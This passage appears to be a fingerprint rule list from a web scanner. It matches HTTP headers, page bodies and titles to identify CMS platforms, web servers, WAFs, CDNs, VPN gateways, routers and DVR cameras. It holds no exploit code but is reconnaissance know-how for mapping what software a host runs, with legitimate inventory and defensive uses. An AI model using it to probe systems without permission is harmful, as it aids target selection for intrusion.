("baidu广告联盟", "http://yingxiao.baidu.com/support/adm/index.html", "9/10/2014",
[{"body": ["http://cpro.baidu.com/cpro/ui/c.js"]}, {"body": ["http://cbjs.baidu.com/js/m.js"]}]),
("doubleclick_ad", "http://www.google.com/doubleclick/", "9/10/2014", [{"body": ["ad.doubleclick.net"]}]),
("Acidcat_CMS", "http://www.acidcat.com/", "9/10/2014",
[{"body": ["Start Acidcat CMS footer information"]}, {"body": ["Powered by Acidcat CMS"]}]),
("ABO_CMS", "http://www.abocms.com/", "9/10/2014", [{"header": ["a-powered-by"]}]),
("6kbbs", "http://www.6kbbs.com", "9/10/2014",
[{"body": ["Powered by 6kbbs"]}, {"body": ["generator\" content=\"6KBBS"]}]),
("3COM_NBX", "http://inpath.com/products/3com-nbx.html", "9/10/2014",
[{"title": ["NBX NetSet"]}, {"body": ["NBX"], "header": ["Alternates"]}]),
("360webfacil_360WebManager", "http://www.360webfacil.com", "9/10/2014",
[{"body": ["publico/template/", "zonapie"]}, {"body": ["360WebManager Software"]}]),
("1024cms", "http://www.1024cms.com", "9/10/2014",
[{"body": ["Powered by 1024 CMS"]}, {"body": ["generator\" content=\"1024 CMS (c)"]}]),
("MS-Author-Via", "http://msdn.microsoft.com/en-us/library/cc250246.aspx", "9/10/2014",
[{"header": ["MS-Author-Via"]}]),
("Aicache", "http://aiscaler.com", "9/10/2014", [{"header": ["X-Aicache"]}]),
("Varnish", "https://www.varnish-cache.org", "9/10/2014", [{"header": ["X-Varnish"]}]),
("sharepoint", "http://microsoft.com/", "9/10/2014",
[{"header": ["Microsoftsharepointteamservices"]}, {"header": ["X-Sharepointhealthscore"]}]),
("TCN协议", "https://www.ietf.org/rfc/rfc2295.txt", "9/10/2014",
[{"header": ["Tcn: choice"]}, {"header": ["Tcn: list"]}]),
("Aspnetmvc", "http://www.asp.net/mvc", "9/10/2014", [{"header": ["Aspnetmvc"]}]),
("FrontPageServerExtension", "http://microsoft.com/", "9/10/2014", [{"header": ["Microsoftofficewebserver"]}]),
("weidun", "http://www.weidun.com.cn", "9/10/2014", [{"header": ["Firewall: www.weidun.com.cn"]}]),
("Swiftlet", "http://swiftlet.org", "9/9/2014", [{"header": ["Swiftlet"]}]),
("webray", "http://www.webray.com.cn/", "9/9/2014", [{"header": ["Rayengine"]}, {"header": ["Drivedby: RaySrv"]}]),
("we7", "http://www.we7.cn", "9/9/2014", [{"body": ["/Widgets/WidgetCollection/"]}]),
("ASP", "http://www.iis.net/", "9/9/2014", [{"header": ["X-Powered-By: ASP"]}]),
("nodejs", "http://nodejs.org", "9/9/2014",
[{"header": ["X-Powered-By: Express"]}, {"header": ["pump.io"]}, {"header": ["node.js"]}]),
("perl", "http://www.perl.org", "9/9/2014", [{"header": ["perl"]}]),
("jsp", "http://www.oracle.com/technetwork/java/javaee/jsp/index.html", "9/9/2014",
[{"header": ["jsp"]}, {"header": ["Servlet"]}, {"header": ["JBoss"]}, {"header": ["JSESSIONID"]}]),
("ruby", "http://rubyonrails.org", "9/9/2014",
[{"header": ["ruby"]}, {"header": ["WEBrick"]}, {"header": ["Phusion"]}, {"header": ["Mongrel"]},
{"header": ["X-Rack-Cache"]}]),
("python", "https://www.djangoproject.com", "9/9/2014", [{"header": ["python"]}, {"header": ["Django"]}]),
("ASP.NET", "http://www.iis.net/", "9/9/2014", [{"header": ["X-Powered-By: ASP.NET"]}]),
("PHP", "http://www.php.net", "9/9/2014", [{"header": ["X-Powered-By: PHP"]}]),
("awstats", "http://www.awstats.org/", "9/9/2014", [{"body": ["awstats.pl?config="]}]),
("awstats_admin", "http://www.awstats.org/", "9/9/2014",
[{"body": ["generator\" content=\"AWStats"]}, {"body": ["<frame name=\"mainleft\" src=\"awstats.pl?config="]}]),
("awstats_misc_tracker", "http://www.awstats.org", "9/9/2014", [{"body": ["/js/awstats_misc_tracker.js"]}]),
("easypanel", "http://www.kanglesoft.com/forum.php?gid=50", "9/9/2014",
[{"body": ["/vhost/view/default/style/login.css"]}]),
(
"kangle反向代理", "http://www.kanglesoft.com", "9/9/2014", [{"header": ["kangle"]}, {"title": ["welcome use kangle"]}]),
("trs_wcm", "http://www.trs.com.cn/product/product-wcm.html", "9/4/2014",
[{"body": ["/wcm/app/js"]}, {"body": ["0;URL=/wcm"]}, {"body": ["window.location.href = \"/wcm\";"]},
{"body": ["forum.trs.com.cn", "wcm"]}, {"body": ["/wcm\" target=\"_blank\">网站管理"]},
{"body": ["/wcm\" target=\"_blank\">管理"]}]),
("AD_RS设备", "http://ipv6.google.com.hk/#newwindow=1&q=AD_RS_COOKIE", "9/4/2014", [{"header": ["AD_RS_COOKIE"]}]),
("万户ezOFFICE", "http://www.whir.net/cn/ezofficeqyb/index_52.html", "9/4/2014", [{"header": ["LocLan"]}]),
("yui", "http://yuilibrary.com", "9/4/2014", [{"body": ["yui.js"]}, {"body": ["yui.min.js"]}]),
("d3", "http://mbostock.github.com/d3/", "9/4/2014",
[{"body": ["/d3.min.js"]}, {"body": ["/d3.v2.min.js"]}, {"body": ["/d3.js"]}, {"body": ["/d3.v2.js"]}]),
("313自助建站", "http://www.313.com.cn", "9/4/2014", [{"header": ["313CMS"]}]),
("F5_BIGIP", "http://www.f5.com.cn", "9/4/2014",
[{"header": ["BIGipServer"]}, {"header": ["X-WA-Info"]}, {"header": ["X-PvInfo"]}]),
("泛微协同办公OA", "http://www.weaver.com.cn/products/enature_info.asp", "9/3/2014",
[{"header": ["testBanCookie"]}, {"body": ["/wui/common/css/w7OVFont.css"]}]),
("juniper_vpn", "http://www.juniper.net/cn/zh/products-services/", "9/3/2014", [{"body": ["welcome.cgi?p=logo"]}]),
("zabbix", "http://www.zabbix.com", "9/3/2014",
[{"body": ["images/general/zabbix.ico"]}, {"header": ["zbx_sessionid"]}]),
("GeoTrust_cert", "http://www.geotrust.com", "9/2/2014", [{"body": ["//smarticon.geotrust.com/si.js"]}]),
("globalsign_cert", "http://cn.globalsign.com", "9/2/2014", [{"body": ["//seal.globalsign.com/SiteSeal"]}]),
("webtrust_cert", "https://cert.webtrust.org", "9/2/2014", [{"body": ["https://cert.webtrust.org/ViewSeal"]}]),
("wosign_ssl_cert", "https://www.wosign.cn", "9/2/2014",
[{"body": ["https://seal.wosign.com/tws.js"]}, {"body": ["https://seal.wosign.com/Signature"]}]),
("thawte_ssl_cert", "https://www.thawte.com/ssl/index.html", "9/2/2014",
[{"body": ["https://seal.thawte.com/getthawteseal"]}]),
("360网站安全检测", "http://webscan.360.cn", "9/1/2014", [{"body": ["webscan.360.cn/status/pai/hash"]}]),
("Bugzilla", "http://www.bugzilla.org", "9/1/2014",
[{"body": ["enter_bug.cgi"]}, {"body": ["/cgi-bin/bugzilla/"]}, {"header": ["Bugzilla_login_request_cookie"]},
{"title": ["Bugzilla Main Page"]}]),
("o2security_vpn", "http://www.o2security.net", "9/1/2014", [{"header": ["client_param=install_active"]}]),
(
"天融信防火墙", "http://www.topsec.com.cn", "9/1/2014", [{"body": ["WEB User Interface"]}, {"header": ["TopWebServer"]}]),
("Array_Networks_VPN", "http://www.arraynetworks.com", "9/1/2014", [{"body": ["an_util.js"]}]),
("天融信VPN", "http://www.topsec.com.cn/aqcp/bjaq/xnzwvpn/ipsecvpnxlcp/index.htm", "9/1/2014",
[{"header": ["TopWebServer"]}, {"header": ["topsecsvportalname"]}]),
("深信服ssl-vpn", "http://www.sangfor.com.cn/product/ssl_vpn/outline.html", "9/1/2014",
[{"body": ["login_psw.csp"]}, {"header": ["TWFID"]}]),
("exchange", "http://office.microsoft.com/zh-cn/exchange/FX103765014.aspx", "9/1/2014",
[{"header": ["owa"]}, {"body": ["owaLgnBdy"]}, {"header": ["OutlookSession"]}]),
("苏亚星校园管理系统", "http://www.suyaxing.com/product.aspx", "8/31/2014", [{"body": ["/ws2004/Public/"]}]),
("gocdn", "http://baidu.com/?q=gocdn", "8/31/2014", [{"header": ["GOCDN"]}]),
("zentao", "http://www.zentao.net", "8/31/2014",
[{"body": ["欢迎使用禅道集成运行环境"]}, {"body": ["powered by <a href='http://www.zentao.net' target='_blank'>ZenTaoPMS"]}]),
("西部数码", "http://www.west263.com/", "8/28/2014", [{"header": ["WT263CDN"]}]),
("Webluker", "http://www.webluker.com/", "8/28/2014", [{"header": ["Webluker-Edge"]}]),
("快网", "http://www.fastweb.com.cn/", "8/28/2014", [{"header": ["Fw-Via: "]}]),
("帝联", "http://www.dnion.com/", "8/28/2014", [{"header": ["Server: DNION"]}, {"header": ["fastcdn.com"]}]),
("网宿", "http://www.chinanetcenter.com/", "8/28/2014",
[{"header": ["Cdn Cache Server"]}, {"header": ["WS CDN Server"]}]),
("蓝讯", "http://www.chinacache.com/", "8/28/2014", [{"header": ["Powered-By-ChinaCache"]}]),
(
"JBoss", "http://www.jboss.org", "8/28/2014", [{"header": ["JBoss"]}, {"body": ["Manage this JBoss AS Instance"]}]),
("Oracle-Application-Server", "http://www.oracle.com/technetwork/middleware/ias/overview/index.html", "8/28/2014",
[{"header": ["Oracle-Application-Server"]}]),
("Sun-ONE-Web-Server", "http://docs.oracle.com/cd/E19857-01/817-1831-10/agintro.html", "8/28/2014",
[{"header": ["Sun-ONE-Web-Server"]}]),
("Jetty", "http://www.eclipse.org/jetty", "8/28/2014", [{"header": ["Server: Jetty"]}]),
("webrick", "https://rubygems.org/gems/webrick", "8/28/2014", [{"header": ["webrick"]}]),
("Phusion", "https://www.phusionpassenger.com", "8/28/2014", [{"header": ["Phusion"]}]),
("Netscape-Enterprise", "http://docs.oracle.com/cd/E19957-01/816-5648-10/es351jpg.html", "8/28/2014",
[{"header": ["Netscape-Enterprise"]}]),
("Resin", "http://caucho.com", "8/28/2014", [{"header": ["Server: Resin"]}]),
("Zeus", "http://zeus.com", "8/28/2014", [{"header": ["Server: Zeus"]}]),
("ngx_openresty", "http://openresty.org/cn/index.html", "8/28/2014", [{"header": ["ngx_openresty"]}]),
("Microsoft-HTTPAPI", "http://www.microsoft.com", "8/28/2014", [{"header": ["Microsoft-HTTPAPI"]}]),
("LiteSpeed", "http://litespeedtech.com/", "8/28/2014", [{"header": ["Server: LiteSpeed"]}]),
("GSE", "https://code.google.com/p/opengse/", "8/28/2014", [{"header": ["Server: GSE"]}]),
("IBM_HTTP_Server", "http://www-03.ibm.com/software/products/en/http-servers/", "8/28/2014",
[{"header": ["IBM_HTTP_Server"]}]),
("Tengine", "http://tengine.taobao.org", "8/28/2014", [{"header": ["Server: Tengine"]}]),
("Apache", "http://www.apache.org", "8/28/2014", [{"header": ["Server: Apache"]}]),
("Apache-Tomcat", "http://tomcat.apache.org", "8/28/2014",
[{"header": ["Apache-Coyote"]}, {"body": ["<HR size=\"1\" noshade=\"noshade\"><p>"]}]),
("Nginx", "http://nginx.org", "8/28/2014", [{"header": ["Server: nginx"]}]),
("IIS", "http://www.iis.net/", "8/28/2014", [{"header": ["Microsoft-IIS"]}, {"header": ["X-Powered-By: WAF/2.0"]}]),
("Websecurity_WAF", "http://ipv6.google.com.hk/#newwindow=1&q=%22Websecurity:+WAF+1.0%22&start=0", "8/28/2014",
[{"header": ["Websecurity: WAF 1.0"]}]),
("安全狗", "http://www.safedog.cn/", "8/28/2014", [{"header": ["WAF/2.0"]}]),
("wamp", "http://www.wampserver.com/", "8/28/2014", [{"title": ["WAMPSERVER"]}]),
("DVR camera", "http://www.dvrnet.org/", "8/28/2014", [{"title": ["DVR WebClient"]}]),
("UPUPW", "http://www.upupw.net/", "8/28/2014", [{"title": ["UPUPW环境集成包"]}]),
("jcg无线路由器", "http://www.jcgcn.com", "8/28/2014",
[{"title": ["Wireless Router"], "body": ["http://www.jcgcn.com"]}]),
("H3C", "http://www.h3c.com.cn/", "8/28/2014",
[{"header": ["H3C-Miniware-Webs"]}, {"title": ["Web user login"], "body": ["nLanguageSupported"]}]),
("nvdvr", "http://www.nvdvr.net/", "8/28/2014", [{"title": ["XWebPlay"]}]),
("LANMP一键安装包", "http://www.wdlinux.cn/", "8/28/2014", [{"title": ["LANMP一键安装包"]}]),
("中兴路由器", "http://www.zte.com.cn/", "8/28/2014", [{"header": ["Server: Mini web server 1.0 ZTE corp 2005."]}]),
("wdcp管理系统", "http://www.wdlinux.cn/bbs/forum-3-1.html", "8/28/2014",
[{"title": ["wdcp服务器"]}, {"title": ["lanmp_wdcp 安装成功"]}]),
("Hikvision", "http://www.hikvision.com/", "8/28/2014",
[{"header": ["Hikvision"]}, {"header": ["DVRDVS"]}, {"header": ["App-webs"]}, {"header": ["DNVRS"]}]),
("mikrotik", "http://www.mikrotik.com/", "8/28/2014", [{"title": ["RouterOS"], "body": ["mikrotik"]}]),
("imailserver", "http://www.imailserver.com/", "8/28/2014",
[{"body": ["myICalUserName"]}, {"header": ["Ipswitch-IMail"]}]),
("Redmine", "http://www.redmine.org/", "8/28/2014", [{"body": ["Redmine", "authenticity_token"]}]),
("易普拉格科研管理系统", "http://www.e-plugger.com/", "8/28/2014",
[{"body": ["lan12-jingbian-hong"]}, {"body": ["科研管理系统,北京易普拉格科技"]}]),
("360企业版", "http://b.360.cn/", "8/28/2014", [{"body": ["360EntInst"]}]),
("NETSurveillance", "http://www.fh-net.cn/product/class/?119.html", "8/28/2014", [{"title": ["NETSurveillance"]}]),
("ICEFLOW_VPN", "http://www.iceflow.cn/", "8/28/2014", [{"header": ["Server: ICEFLOW"]}]),
("Vmware_vFabric", "http://www.vmware.com/products/vfabric-tcserver/", "8/28/2014",
[{"title": ["vFabric"]}, {"header": ["TS01efd1fa"]}]),
("phpinfo", "http://www.php.net/", "8/28/2014", [{"title": ["phpinfo"], "body": ["Virtual Directory Support"]}]),
("VisualSVN", "http://www.visualsvn.com/server/", "8/28/2014", [{"title": ["VisualSVN Server"]}]),
("瑞友天翼_应用虚拟化系统", "http://www.realor.cn/product/tianyi/", "8/28/2014", [{"title": ["瑞友天翼-应用虚拟化系统"]}]),
("金和协同管理平台", "http://www.jinher.com/chan-pin-ti-xi/c6", "8/28/2014", [{"title": ["金和协同管理平台"]}]),
("EnterCRM", "http://www.entersoft.cn/ProductView.asp?ID=23&SortID=131", "8/28/2014", [{"body": ["EnterCRM"]}]),
("oracle_applicaton_server", "https://www.oracle.com/", "8/28/2014", [{"body": ["OraLightHeaderSub"]}]),
("huawei_auth_server", "http://www.huawei.com/", "8/28/2014", [{"body": ["75718C9A-F029-11d1-A1AC-00C04FB6C223"]}]),
("锐捷NBR路由器", "http://www.ruijie.com.cn/", "8/28/2014", [{"body": ["free_nbr_login_form.png"]}]),
("亿赛通DLP", "http://www.esafenet.com/", "8/28/2014", [{"body": ["CDGServer3"]}]),
("百为路由", "http://www.bytevalue.com/", "8/28/2014", [{"body": ["提交验证的id必须是ctl_submit"]}]),
("Incapsula", "http://www.incapsula.com/", "8/28/2014", [{"header": ["X-Cdn: Incapsula"]}]),
("bxemail", "http://www.bxemail.com", "8/27/2014",
[{"title": ["百讯安全邮件系统"]}, {"title": ["百姓邮局"]}, {"body": ["请输入正确的电子邮件地址,如:abc@bxemail.com"]}]),
("万网企业云邮箱", "http://mail.mxhichina.com/", "8/27/2014", [{"body": ["static.mxhichina.com/images/favicon.ico"]}]),
("magicwinmail", "http://www.magicwinmail.com", "8/27/2014", [{"header": ["magicwinmail_default_theme"]}]),
("EasyTrace(botwave)", "http://www.botwave.com/products/easytrace/solution.html", "8/27/2014",
[{"title": ["EasyTrace"], "body": ["login_page"]}]),
("WishOA", "http://www.wishtech.com.cn", "8/26/2014", [{"body": ["WishOA_WebPlugin.js"]}]),
("78oa", "http://www.78oa.com/", "8/26/2014",
[{"body": ["/resource/javascript/system/runtime.min.js"]}, {"body": ["license.78oa.com"]}]),
("PHPOA", "http://www.phpoa.cn", "8/26/2014", [{"body": ["admin_img/msg_bg.png"]}]),
("buscape", "http://www.buscape.com.br", "8/26/2014", [{"header": ["sessao3"]}]),
("techbridge", "http://www.techbridge-inc.com/", "8/25/2014", [{"body": ["Sorry,you need to use IE brower"]}]),
("ZendServer", "http://www.zend.com/en/products/server", "8/25/2014", [{"header": ["ZendServer"]}]),
("Z-Blog", "http://www.zblogcn.com/", "8/25/2014",
[{"body": ["strBatchView", "str00"]}, {"body": ["Powered By Z-Blog"]}, {"body": ["generator\" content=\"Z-Blog"]},
{"header": ["Product: Z-Blog"]}]),
("sdcms", "http://www.sdcms.cn", "8/23/2014",
[{"title": ["powered by sdcms"], "body": ["var webroot=", "/js/sdcms.js"]}]),
("disqus", "http://www.disqus.com/", "8/22/2014", [{"body": ["disqus_thread"]}]),
("ujian", "http://www.ujian.cc/", "8/22/2014", [{"body": ["ujian.cc/code/ujian.js"]}]),
("uyan", "http://www.uyan.cc/", "8/22/2014", [{"body": ["uyan.cc/code/uyan.js"]}]),
("jiathis", "http://jiathis.com/", "8/22/2014", [{"body": ["jiathis.com/code/jia.js"]}]),
("eaststorecreeator", "http://www.easystorecreator.com/", "8/22/2014", [{"header": ["easystorecreator1"]}]),
("cloudflare", "https://www.cloudflare.com/", "8/21/2014", [{"header": ["cloudflare-nginx"]}]),
("Telerik Sitefinity", "http://www.sitefinity.com/", "8/11/2014",
[{"body": ["Telerik.Web.UI.WebResource.axd"]}, {"body": ["content=\"Sitefinity"]}]),
("Liferay", "http://www.liferay.com", "8/11/2014", [{"header": ["Liferay-Portal"]}]),
("iAPPS", "http://www.iapps.com/products/iapps-content-manager", "8/11/2014", [{"header": ["iAPPSCookie"]}]),
("ExpressionEngine", "https://ellislab.com/expressionengine/", "8/11/2014", [{"header": ["exp_tracker"]}]),
("Parallels Plesk Panel", "http://www.parallels.com/products/plesk/", "8/11/2014",
[{"body": ["Parallels IP Holdings GmbH"]}]),
("Plesk", "http://sp.parallels.com/products/plesk/", "8/11/2014", [{"header": ["PleskLin"]}]),
("Tumblr", "https://www.tumblr.com/", "8/11/2014", [{"header": ["X-Tumblr-User"]}]),
("Dolibarr", "http://www.dolibarr.org/", "8/11/2014", [{"body": ["Dolibarr Development Team"]}]),
("TurboMail", "http://www.turbomail.org/", "8/1/2014",
[{"body": ["Powered by TurboMail"]}, {"body": ["wzcon1 clearfix"]}, {"title": ["TurboMail邮件系统"]}]),
("GPSweb", "http://ipv6.google.com.hk/#newwindow=1&q=GPSweb", "8/1/2014", [{"title": ["GPSweb"]}]),
("Polycom", "http://support.polycom.com/PolycomService/support/us/support/video/index.html", "7/31/2014",
[{"title": ["Polycom"], "body": ["kAllowDirectHTMLFileAccess"]}]),
("360主机卫士", "http://webscan.360.cn/guard/", "7/30/2014", [{"header": ["X-Safe-Firewall"]}]),
("一启快", "http://www.yiqikuai.com/", "7/30/2014", [{"header": ["yiqikuai.com"]}]),
("主机宝", "http://z.admin5.com/", "7/30/2014", [{"body": ["您访问的是主机宝服务器默认页"]}]),
("srun3000计费认证系统", "http://www.srun.com/", "7/29/2014", [{"title": ["srun3000"]}]),
("网易企业邮箱", "http://qiye.163.com/", "7/29/2014", [{"title": ["邮箱用户登录"], "body": ["frmvalidator"]}]),
("pmway_E4_crm", "http://www.pmway.com/", "7/29/2014", [{"title": ["E4", "CRM"]}]),
("NetShare_VPN", "http://www.zkvpn.com/", "7/29/2014", [{"title": ["NetShare", "VPN"]}]),
("AVCON6", "http://www.epross.com/", "7/29/2014", [{"title": ["AVCON6"]}, {"body": ["language_dispose.action"]}]),
("SonicWALL", "http://www.sonicwall.com/", "7/28/2014", [{"header": ["Server: SonicWALL"]}]),
("亿邮", "http://eyou.net/", "7/28/2014",
[{"body": ["EYOU企业邮箱"]}, {"header": ["eYouWS"]}, {"body": ["cr\">eYouMail"]}, {"header": ["EMPHPSID"]}]),
("MVB2000", "http://www.mvb2000.cn", "7/28/2014", [{"title": ["MVB2000"]}, {"body": ["The Magic Voice Box"]}]),
("dd-wrt", "http://www.dd-wrt.com/", "7/28/2014", [{"body": ["dd-wrt.com", "load average"]}]),
("Sun[tm]", "http://www.oracle.com/us/sun/index.htm", "7/28/2014",
[{"title": ["Sun[tm] ONE Web Server"]}, {"header": ["Server: Sun-ONE-Web-Server"]}]),
("edvr", "http://ipv6.google.com.hk/#newwindow=1&q=EDVS+edvr", "7/28/2014", [{"title": ["edvs/edvr"]}]),
("iDVR", "http://ipv6.google.com.hk/#newwindow=1&q=idvr", "7/28/2014", [{"header": ["Server: iDVRhttpSvr"]}]),
("EdmWebVideo", "http://www.baidu.com/s?wd=EdmWebVideo", "7/28/2014", [{"title": ["EdmWebVideo"]}]),
("webplus", "http://www.sudytech.com/", "7/28/2014", [{"body": ["webplus", "高校网站群管理平台"]}]),
("LuManager", "http://www.zijidelu.org/", "7/28/2014", [{"title": ["LuManager"]}]),
("管理易", "http://www.ekingcn.com/", "7/25/2014", [{"body": ["管理易", "minierp"]}]),
("Coremail", "http://www.coremail.cn/", "7/25/2014",
[{"title": ["/coremail/common/assets"]}, {"title": ["Coremail邮件系统"]}, {"body": ["coremail/common/"]}]),
("用友erp-nc", "http://www.yonyou.com/product/NC.aspx", "7/24/2014",
[{"body": ["/nc/servlet/nc.ui.iufo.login.Index"]}, {"title": ["用友新世纪"]}]),
("supesite", "http://www.comsenz.com/downloads/install/supesite/", "7/23/2014", [{"header": ["supe_sid"]}]),
("同城多用户商城", "http://www.anxin66.com/", "7/23/2014", [{"body": ["style_chaoshi"]}]),
("DIYWAP", "http://www.diywap.cn/", "7/23/2014", [{"body": ["web980", "bannerNum"]}]),
("TCCMS", "http://www.teamcen.com/", "7/23/2014",
[{"title": ["Power By TCCMS"]}, {"body": ["index.php?ac=link_more", "index.php?ac=news_list"]}]),
("Shop7Z", "http://www.shop7z.com/", "7/22/2014",
[{"header": ["sitekeyword"]}, {"body": ["productlist.asp", "headlist"]}]),
("IdeaCMS", "http://www.ideacms.net/", "7/22/2014", [{"body": ["Powered By IdeaCMS"]}, {"body": ["m_ctr32"]}]),
("emlog", "http://www.emlog.net/", "7/22/2014", [{"body": ["content=\"emlog\""]}]),
("phpshe", "http://www.phpshe.com", "7/16/2014", [{"body": ["phpshe"]}]),
("华天动力OA(OA8000)", "http://www.oa8000.com", "7/16/2014", [{"body": ["/OAapp/WebObjects/OAapp.woa"]}]),
("ThinkSAAS", "http://www.thinksaas.cn", "7/16/2014", [{"body": ["/app/home/skins/default/style.css"]}]),
("e-tiller", "http://www.e-tiller.com", "7/16/2014", [{"body": ["reader/view_abstract.aspx"]}]),
(
"mongodb", "http://www.mongodb.org", "7/11/2014", [{"body": ["<a href=\"/_replSet\">Replica set status</a></p>"]}]),
("易瑞授权访问系统", "http://www.infcn.com.cn/iras/752.jhtml", "7/9/2014",
[{"body": ["/authjsp/login.jsp"]}, {"body": ["FE0174BB-F093-42AF-AB20-7EC621D10488"]}]),
("fangmail", "http://www.fangmail.net/", "7/9/2014", [{"body": ["/fangmail/default/css/em_css.css"]}]),
("腾讯企业邮箱", "http://exmail.qq.com/", "7/9/2014", [{"body": ["/cgi-bin/getinvestigate?flowid="]}]),
("通达OA", "http://www.tongda2000.com/", "7/9/2014",
[{"body": ["<link rel=\"shortcut icon\" href=\"/images/tongda.ico\" />"]},
{"body": ["OA提示:不能登录OA", "紧急通知:今日10点停电"]}, {"body": ["Office Anywhere 2013"]}]),
("jira", "https://www.atlassian.com/software/jira", "7/8/2014",
[{"body": ["jira.webresources"]}, {"header": ["atlassian.xsrf.token"]}, {"body": ["ams-build-number"]},
{"body": ["com.atlassian.plugins"]}]),
("fisheye", "https://www.atlassian.com/software/fisheye/overview", "7/8/2014",
[{"header": ["Set-Cookie: FESESSIONID"]}, {"body": ["fisheye-16.ico"]}]),
("elasticsearch", "http://www.elasticsearch.org/", "7/7/2014",
[{"body": ["You Know, for Search"]}, {"header": ["application/json"], "body": ["build_hash"]}]),
("MDaemon", "http://www.altn.com/Products/MDaemon-Email-Server-Windows/", "7/7/2014",
[{"body": ["/WorldClient.dll?View=Main"]}]),
("ThinkPHP", "http://www.thinkphp.cn", "7/3/2014", [{"header": ["thinkphp"]}, {"header": ["think_template"]}]),
("OA(a8/seeyon/ufida)", "http://yongyougd.com/productsview88.html", "7/1/2014",
[{"body": ["/seeyon/USER-DATA/IMAGES/LOGIN/login.gif"]}]),
("yongyoufe", "http://yongyougd.com/productsview88.html", "7/1/2014",
[{"title": ["FE协作"]}, {"body": ["V_show", "V_hedden"]}]),
("Zen Cart", "http://www.zen-cart.com/", "12/18/2013",
[{"body": ["shopping cart program by Zen Cart"]}, {"header": ["Set-Cookie: zenid="]}]),
("iWebShop", "http://www.jooyea.cn/", "12/18/2013",
[{"body": ["Powered by", "iWebShop"]}, {"header": ["iweb_safecode"]}, {"body": ["/runtime/default/systemjs"]}]),
("DouPHP", "http://www.douco.com/", "12/18/2013",
[{"body": ["Powered by DouPHP"]}, {"body": ["controlBase", "indexLeft", "recommendProduct"]}]),
("twcms", "http://www.twcms.cn/", "12/18/2013", [{"body": ["/twcms/theme/", "/css/global.css"]}]),
("Cicro", "http://www.cicro.com/", "12/3/2013",
[{"body": ["Cicro", "CWS"]}, {"body": ["content=\"Cicro"]}, {"body": ["index.files/cicro_userdefine.css"]},
{"body": ["structure/index", "window.location.href="]}]),
("SiteServer", "http://www.siteserver.cn/", "11/29/2013",
[{"body": ["Powered by", "http://www.siteserver.cn", "SiteServer CMS"]}, {"title": ["Powered by SiteServer CMS"]},
{"body": ["T_系统首页模板"]}, {"body": ["siteserver", "sitefiles"]}]),
("Joomla", "http://www.Joomla.org", "11/28/2013",
[{"body": ["content=\"Joomla"]}, {"body": ["/media/system/js/core.js", "/media/system/js/mootools-core.js"]}]),
("phpbb", "http://www.phpbb.com/", "11/28/2013",
[{"header": ["Set-Cookie: phpbb3_"]}, {"header": ["HttpOnly, phpbb3_"]},
{"body": ["©", "http://www.longluntan.com/zh/phpbb/", "phpBB"]}, {"body": ["phpBB Group\" /\>"]},
{"body": ["START QUICK HACK - phpBB Statistics MOD"]}]),
("HDWiki", "http://kaiyuan.hudong.com/", "11/26/2013",
[{"title": ["powered by hdwiki!"]}, {"body": ["content=\"HDWiki"]},
{"body": ["http://kaiyuan.hudong.com?hf=hdwiki_copyright_kaiyuan"]}, {"header": ["hd_sid="]}]),
("kesionCMS", "http://www.kesion.com/", "11/25/2013",
[{"body": ["/ks_inc/common.js"]}, {"body": ["publish by KesionCMS"]}]),
("CMSTop", "http://www.cmstop.com/", "11/23/2013",
[{"body": ["/css/cmstop-common.css"]}, {"body": ["/js/cmstop-common.js"]}, {"body": ["cmstop-list-text.css"]},
{"body": ["<a class=\"poweredby\" href=\"http://www.cmstop.com\""]}]),
("ESPCMS", "http://www.ecisp.cn/", "11/23/2013", [{"title": ["Powered by ESPCMS"]}, {"body": ["Powered by ESPCMS"]},
{"body": ["infolist_fff",
"/templates/default/style/tempates_div.css"]}]),
("74cms", "http://www.74cms.com/", "11/23/2013", [{"body": ["content=\"74cms.com"]}, {"body": ["content=\"骑士CMS"]},
{"body": ["Powered by <a href=\"http://www.74cms.com/\""]}, {
"body": ["/templates/default/css/common.css",
"selectjobscategory"]}]),
("Foosun", "http://www.foosun.net/", "11/21/2013", [{"body": ["Created by DotNetCMS"]}, {"body": ["For Foosun"]}, {
"body": ["Powered by www.Foosun.net,Products:Foosun Content Manage system"]}]),
("PhpCMS", "http://www.phpcms.com/", "11/21/2013",
[{"body": ["Powered by", "http://www.phpcms.cn"]}, {"body": ["content=\"Phpcms"]},
{"body": ["Powered by", "phpcms"]}]),
("Hanweb", "http://www.hanweb.com/", "11/21/2013",
[{"body": ["Produced By 大汉网络"]}, {"body": ["/jcms_files/jcms"]}, {"body": ["<meta name='Author' content='大汉网络'>"]},
{"body": ["<meta name='Generator' content='大汉版通'>"]},
{"body": ["<a href='http://www.hanweb.com' style='display:none'>"]}]),
("Drupal", "http://www.drupal.org/", "11/21/2013",
[{"header": ["X-Generator: Drupal"]}, {"body": ["content=\"Drupal"]}, {"body": ["jQuery.extend(Drupal.settings"]},
{"body": ["/sites/default/files/", "content=\"/sites/all/modules/", "/sites/all/themes/"]}]),
("phpwind", "http://www.phpwind.net/", "11/19/2013",
[{"title": ["Powered by phpwind"]}, {"body": ["content=\"phpwind"]}]),
("Discuz", "http://www.discuz.net/", "11/19/2013",
[{"title": ["Powered by Discuz"]}, {"body": ["content=\"Discuz"]}, {"body": ["discuz_uid", "portal.php?mod=view"]},
{"body": ["Powered by <strong><a href=\"http://www.discuz.net"]}]),
("vBulletin", "http://www.vBulletin.com/", "11/19/2013",
[{"title": ["Powered by vBulletin"], "body": ["content=\"vBulletin"]},
{"header": ["bbsessionhash", "bblastvisit"]}, {"body": ["Powered by vBulletin™"]}]),
("cmseasy", "http://www.cmseasy.cn/", "11/19/2013",
[{"title": ["Powered by CmsEasy"]}, {"header": ["http://www.cmseasy.cn/service_1.html"]},
{"body": ["content=\"CmsEasy"]}]),
("wordpress", "http://www.wordpress.com/", "11/19/2013",
[{"body": ["content=\"WordPress"]}, {"header": ["X-Pingback", "/xmlrpc.php"], "body": ["/wp-includes/"]}]),
("DedeCMS", "http://www.dedecms.com/", "11/19/2013",
[{"body": ["Power by DedeCms"]}, {"body": ["Powered by", "http://www.dedecms.com/", "DedeCMS"]},
{"body": ["/templets/default/style/dedecms.css"]}]),
("ASPCMS", "http://www.aspcms.com/", "11/19/2013",
[{"title": ["Powered by ASPCMS"]}, {"body": ["content=\"ASPCMS"]}, {"body": ["/inc/AspCms_AdvJs.asp"]}]),
("MetInfo", "http://www.metinfo.com/", "11/19/2013",
[{"title": ["Powered by MetInfo"]}, {"body": ["content=\"MetInfo"]}, {"body": ["powered_by_metinfo"]},
{"body": ["/images/css/metinfo.css"]}]),
("PageAdmin", "http://www.pageadmin.net/", "11/19/2013",
[{"title": ["Powered by PageAdmin"]}, {"body": ["content=\"PageAdmin"]},
